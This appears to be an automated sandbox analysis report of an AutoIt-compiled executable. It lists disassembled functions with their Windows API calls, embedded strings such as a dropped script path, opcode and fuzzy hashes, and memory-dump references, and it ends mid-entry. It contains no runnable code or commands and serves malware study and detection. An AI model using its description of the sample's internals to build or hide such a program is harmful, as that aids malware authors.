String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: cf87a66b8bbe14e539f1e61b1abb392f86aac66a1eb65d7c1ec3db764d098120
Instruction ID: 6555589ea4a1412db2877a232f831d8557301dffc0a7bdc34385af2afcfb4755
Opcode Fuzzy Hash: cf87a66b8bbe14e539f1e61b1abb392f86aac66a1eb65d7c1ec3db764d098120
Instruction Fuzzy Hash: BEF0DAB5BD13507BF6309A64AD87F523658E748F11F31044AB780BF1C8D6EA79408BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2FD3, Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.SECHOST(00000000,00000000,00000008,010590E8,14000000,00FDE1BD), ref: 00FE2FDD
LockServiceDatabase.ADVAPI32(00000000), ref: 00FE2FEA
UnlockServiceDatabase.ADVAPI32(00000000), ref: 00FE2FF5
CloseServiceHandle.ADVAPI32(00000000), ref: 00FE2FFE
GetLastError.KERNEL32 ref: 00FE3009
CloseServiceHandle.ADVAPI32(00000000), ref: 00FE3019

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
String ID:
API String ID: 1690418490-0
Opcode ID: 232d021152979d0985825d484193aa476ba13510170d87319716dd402f488103
Instruction ID: d68608bb955d18fc39f450b1aa1af7adb7f1e6a2af4c18697f694ecd0f7e38e7
Opcode Fuzzy Hash: 232d021152979d0985825d484193aa476ba13510170d87319716dd402f488103
Instruction Fuzzy Hash: 69E09B31983320ABD6311A256D0DBDB775EAF1A721F040403F381D3146CB5F850DEBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC06E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32 ref: 00FC06F7
RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,?,?), ref: 00FC071E
RegCloseKey.ADVAPI32(?), ref: 00FC0745
RegCloseKey.ADVAPI32(?), ref: 00FC0759

Strings

Control Panel\Mouse, xrefs: 00FC06F5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$OpenQueryValue
String ID: Control Panel\Mouse
API String ID: 1607946009-824357125
Opcode ID: ca8dcbe485c9634d85dd3725e684d071a11f47383bf559de78d642f25b377b3c
Instruction ID: 7036cb47142e189c699a30391e9d7843d38922fd6d90f494e1313bcede6191b2
Opcode Fuzzy Hash: ca8dcbe485c9634d85dd3725e684d071a11f47383bf559de78d642f25b377b3c
Instruction Fuzzy Hash: 19119176A40109FF8B14CFA8D845DEFB7BDEF58310B00454AF948C3200E631A905DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FBFEA7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 00FBFED3
_memmove.LIBCMT ref: 00FBFEE2
__fread_nolock.LIBCMT ref: 00FBFF02
_fseek.LIBCMT ref: 00FBFF58

Strings

AU3!, xrefs: 00FBFECD

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __fread_nolock_fseek_memmove_strcat
String ID: AU3!
API String ID: 1268643489-3499719025
Opcode ID: 79568b54aa932d7dc68a59e22dec40fc7d10b01c5e2300b83376c17661f78001
Instruction ID: ed84b5960fe895b78cdf323021b65fd1b5937a91b02608f6d8d4a47c972b48cc
Opcode Fuzzy Hash: 79568b54aa932d7dc68a59e22dec40fc7d10b01c5e2300b83376c17661f78001
Instruction Fuzzy Hash: 44112672D002449BCB11CB688CC1FFD3B65AB49300F1845A8F995DB242DA74A648CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FBF490, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00FBFE20: _wcslen.LIBCMT ref: 00FBFE35
Part of subcall function 00FBFE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,010043ED,?,00000000,?,?), ref: 00FBFE4E
Part of subcall function 00FBFE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00FBFE77

_strcat.LIBCMT ref: 00FBF4B6

Part of subcall function 00FBF540: _strlen.LIBCMT ref: 00FBF548
Part of subcall function 00FBF540: _sprintf.LIBCMT ref: 00FBF69E

Strings

C:\Users\user\33920049\fmkkelc.omp, xrefs: 00FBF49D
?T, xrefs: 00FBF522

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
String ID: C:\Users\user\33920049\fmkkelc.omp$?T
API String ID: 3199840319-1252527677
Opcode ID: e0011beb1a02ae5c4516af8997491d5a585f55aae488dc29d7b4989de223df74
Instruction ID: 00ba03d05d9b8b8d450d9530073f2256c9fa44e92dfc1a98a3a6632a59c94fe2
Opcode Fuzzy Hash: e0011beb1a02ae5c4516af8997491d5a585f55aae488dc29d7b4989de223df74
Instruction Fuzzy Hash: 7A21E7B2A082015BC714FF749C83EAEB299AF45310F14893EF555C6282FA38E554AB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FC14F7, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00FC1511

Part of subcall function 00FC34DB: __FF_MSGBANNER.LIBCMT ref: 00FC34F4
Part of subcall function 00FC34DB: __NMSG_WRITE.LIBCMT ref: 00FC34FB
Part of subcall function 00FC34DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00FC6A35,?,00000001,?,?,00FC8179,00000018,0103D180,0000000C,00FC8209), ref: 00FC3520

std::exception::exception.LIBCMT ref: 00FC1546
std::exception::exception.LIBCMT ref: 00FC1560
__CxxThrowException@8.LIBCMT ref: 00FC1571

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: b1f299910fcb0987f464e58571d7b375ebfbb0c23cefa8995031340de801fbfb
Instruction ID: 672fd2b0bc46d3c1689ca2d72db28bf287e6e9c1adccd184c6a8e36bc478390c
Opcode Fuzzy Hash: b1f299910fcb0987f464e58571d7b375ebfbb0c23cefa8995031340de801fbfb
Instruction Fuzzy Hash: D7F0497590020B5BCB24EF54CE43F9D3669BB86310F14041DF44191182DF76CA15AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1D10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FB1D11

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

_memmove.LIBCMT ref: 00FB1D57

Part of subcall function 00FC14F7: std::exception::exception.LIBCMT ref: 00FC1546
Part of subcall function 00FC14F7: std::exception::exception.LIBCMT ref: 00FC1560
Part of subcall function 00FC14F7: __CxxThrowException@8.LIBCMT ref: 00FC1571

Strings

@EXITCODE, xrefs: 00FB1D10, 00FB1D53

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
String ID: @EXITCODE
API String ID: 2734553683-3436989551
Opcode ID: 1a844ac73ab799d9daf97c23806e3f3c9fcb079102dc3b8a7e42763821c4ca4c
Instruction ID: 4a140029fcb07ec6b4529164bac311befc2cbcf60656909c7c55ca477fca8bae
Opcode Fuzzy Hash: 1a844ac73ab799d9daf97c23806e3f3c9fcb079102dc3b8a7e42763821c4ca4c
Instruction Fuzzy Hash: 86F06DF2A406425FD754DB75CD43F6776D4AB4A704F08C92EA08BC6782FA79E442AB10

Uniqueness

Uniqueness Score: -1.00%

Function 01025031, Relevance: 4.9, APIs: 3, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e43add05e22230dfff1b92e730657fa54266ca73cf7d601896de98c753b5fc
Instruction ID: 810778286647a7024ecc905febbe7c02ec928cec2e126f58da4d5eef8661207f
Opcode Fuzzy Hash: 21e43add05e22230dfff1b92e730657fa54266ca73cf7d601896de98c753b5fc
Instruction Fuzzy Hash: D8F156756083029FC710DF28C880AAABBE4FF89314F14895DF9998B392D775E945CF92

Uniqueness

Uniqueness Score: -1.00%

Function 01017629, Relevance: 4.8, APIs: 3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsicoll
String ID:
API String ID: 3832890014-0
Opcode ID: 97403d14eb5af7a05a1061d8298e8f28caac4c7605a7f2dee232ed883d957582
Instruction ID: f5beedd2392acd072880cc108975b500803f44752f69702636854f215780ca63
Opcode Fuzzy Hash: 97403d14eb5af7a05a1061d8298e8f28caac4c7605a7f2dee232ed883d957582
Instruction Fuzzy Hash: 81A1F67220020A4FD750EF5DEC859ABBBE4EF85315F10896EFE85C7241D73A9825DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FDA943, Relevance: 4.7, APIs: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

VariantInit.OLEAUT32(00000000), ref: 00FDA95F
VariantCopy.OLEAUT32(?,?), ref: 00FDA969
VariantClear.OLEAUT32(00000000), ref: 00FDA97A

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_malloc
String ID:
API String ID: 2981388473-0
Opcode ID: 477b3606bc52f432e985b7b13d035d63097347e57f8a1a87242c3dbe3e2ce26f
Instruction ID: a91e1cdf081822120f28b278533d8383bfe14f8d28895d414f80dc7ddae10569
Opcode Fuzzy Hash: 477b3606bc52f432e985b7b13d035d63097347e57f8a1a87242c3dbe3e2ce26f
Instruction Fuzzy Hash: 69817F71D043408FCB35DB19C8C5B5AB7A2AB86320F1C491EE4898B711D739EC84EB97

Uniqueness

Uniqueness Score: -1.00%

Function 00FC49DA, Relevance: 4.7, APIs: 3, Instructions: 160COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00FC4AA6
__read.LIBCMT ref: 00FC4B09
__filbuf.LIBCMT ref: 00FC4B25

Part of subcall function 00FC7E9A: __getptd_noexit.LIBCMT ref: 00FC7E9A

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 1794320848-0
Opcode ID: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
Instruction ID: 97c5d38daaa3e2e9e140346a4b94f6e4a8f17ea5ea2f2975dabeaaf8888cd218
Opcode Fuzzy Hash: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
Instruction Fuzzy Hash: 7151B532E00207DBCB249FA98A56F9EB775AF80330F24826DE435A6191D774EE50FB54

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3868, Relevance: 4.7, APIs: 3, Instructions: 154COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FB3853
_wcslen.LIBCMT ref: 00FB38AD

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 74aa89b194baf1ab0677dca40a6bf60f02a27ae3f8ba5ee9965aafbd16855d3e
Instruction ID: 8b97aa8a072135874135d244e27f6c8dffbc7706490468360ee9564101b96f06
Opcode Fuzzy Hash: 74aa89b194baf1ab0677dca40a6bf60f02a27ae3f8ba5ee9965aafbd16855d3e
Instruction Fuzzy Hash: DD5109B1D4834199E721EB558D42BEB73E5AF82750F08882DF8C153201EB35DA49E7D3

Uniqueness

Uniqueness Score: -1.00%

Function 010252BA, Relevance: 4.6, APIs: 3, Instructions: 141COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 01025381
TerminateProcess.KERNEL32(00000000), ref: 01025388

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentTerminate
String ID:
API String ID: 2429186680-0
Opcode ID: 74e0822f81e746f90f5564936960f9b25674353be69721527e29dab7f477cd90
Instruction ID: bb48e11c2f93ded73793b7f83246028e7f2d305b8671f8253da4ba67deaa818b
Opcode Fuzzy Hash: 74e0822f81e746f90f5564936960f9b25674353be69721527e29dab7f477cd90
Instruction Fuzzy Hash: 8C5168716083059FDB10EF28CC81BAAB7E4FF84314F14895DFA958B282D779E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FE297C, Relevance: 4.6, APIs: 3, Instructions: 58COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00FE2991
MultiByteToWideChar.KERNEL32(00000000,00000001,?,01004515,00000000,00000000,?,?,?,01004515,?,000000FF), ref: 00FE29A6
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,01004515,00000000,00000000,000000FF), ref: 00FE29E5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_strlen
String ID:
API String ID: 1433632580-0
Opcode ID: c22c4e54a4e01e806b1ed824ae4f77e56455b48632f6fc75a979f983dcacebbf
Instruction ID: 0cb74edf12572b6c30baec62aac7709e338e5d77709dad66560fcaf43ec605da
Opcode Fuzzy Hash: c22c4e54a4e01e806b1ed824ae4f77e56455b48632f6fc75a979f983dcacebbf
Instruction Fuzzy Hash: E201F2377401043BE71459ADAC86FAFB76CDBC5B70F05012AFA0DDB2C1E9A6A80062A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FBFE20, Relevance: 4.6, APIs: 3, Instructions: 58COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FBFE35
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,010043ED,?,00000000,?,?), ref: 00FBFE4E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00FBFE77

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_wcslen
String ID:
API String ID: 2761822629-0
Opcode ID: 9aa96b826c69be18675ad5de7d759b1e6ba32ebaefe287d1f8209b6f209def6e
Instruction ID: 7c70e880d2144e334a2b113bf433bdeabe199eccc48c52a88df62636ec81d34a
Opcode Fuzzy Hash: 9aa96b826c69be18675ad5de7d759b1e6ba32ebaefe287d1f8209b6f209def6e
Instruction Fuzzy Hash: 8901F972B8020476E23059BE5C07FABB25CDB87F30F20027AFF08E61D1E5A6EC1451A5

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9769, Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32 ref: 00FB97A6
DispatchMessageW.USER32(?), ref: 00FB97B1
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB97C4

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: c0d148b0742c282ad5b8eaca5112462c89d328451a518e4d7961b1c83d45f944
Instruction ID: c3308bc7770205dd6374a915b9eda107083fa4c5085490389b07ac2ffcdd7e35
Opcode Fuzzy Hash: c0d148b0742c282ad5b8eaca5112462c89d328451a518e4d7961b1c83d45f944
Instruction Fuzzy Hash: A7F05E315583019ADB24DBA28D51BDB77E8AF98780F10481DFB82825E0FBB4D444EF63

Uniqueness

Uniqueness Score: -1.00%

Function 00FBF180, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON

Download Yara Rule

APIs

Part of subcall function 00FBF490: _strcat.LIBCMT ref: 00FBF4B6

_free.LIBCMT ref: 00FD9524

Part of subcall function 00FB35F0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00FB3681
Part of subcall function 00FB35F0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00FB3697
Part of subcall function 00FB35F0: __wsplitpath.LIBCMT ref: 00FB36C2
Part of subcall function 00FB35F0: _wcscpy.LIBCMT ref: 00FB36D7
Part of subcall function 00FB35F0: _wcscat.LIBCMT ref: 00FB36EC
Part of subcall function 00FB35F0: SetCurrentDirectoryW.KERNEL32(?), ref: 00FB36FC

Strings

C:\Users\user\33920049\fmkkelc.omp, xrefs: 00FBF188, 00FBF18B, 00FBF1B5, 00FBF1B7

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
String ID: C:\Users\user\33920049\fmkkelc.omp
API String ID: 3938964917-1265946250
Opcode ID: 8cd6e88f029fb513468f8ad5763544cb9780abbff48aed65a454dc1669caeaa4
Instruction ID: 13d4f5f1f1f559c9d92bbdad8527d9871d5a5113cd478fd816666a12771198e8
Opcode Fuzzy Hash: 8cd6e88f029fb513468f8ad5763544cb9780abbff48aed65a454dc1669caeaa4
Instruction Fuzzy Hash: 2091A071D04219ABCF14EFA4CC819EE7779BF49310F14852AF915AB342D778EA05EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FBF1D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?,?,?,00000001), ref: 00FD959F

Part of subcall function 00FBF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,00FBF1F5,C:\Users\user\33920049\fmkkelc.omp,010590E8,C:\Users\user\33920049\fmkkelc.omp,?,00FBF1F5,?,?,00000001), ref: 00FBF23C

Part of subcall function 00FBF3B0: SHGetMalloc.SHELL32(00FBF1FC), ref: 00FBF3BD
Part of subcall function 00FBF3B0: SHGetDesktopFolder.SHELL32(?), ref: 00FBF3D2
Part of subcall function 00FBF3B0: _wcsncpy.LIBCMT ref: 00FBF3ED
Part of subcall function 00FBF3B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00FBF427
Part of subcall function 00FBF3B0: _wcsncpy.LIBCMT ref: 00FBF440

Part of subcall function 00FBF290: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00FBF2AB

Strings

X, xrefs: 00FD9564

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
String ID: X
API String ID: 85490731-3081909835
Opcode ID: d72888e7069c572fe01ed56804589e83130b28d9647e5e512cef4c37881623cf
Instruction ID: 477b930560d71285f3a5d9c2cd8f546ff429fd9d52a7344c2b8516c9e3558c72
Opcode Fuzzy Hash: d72888e7069c572fe01ed56804589e83130b28d9647e5e512cef4c37881623cf
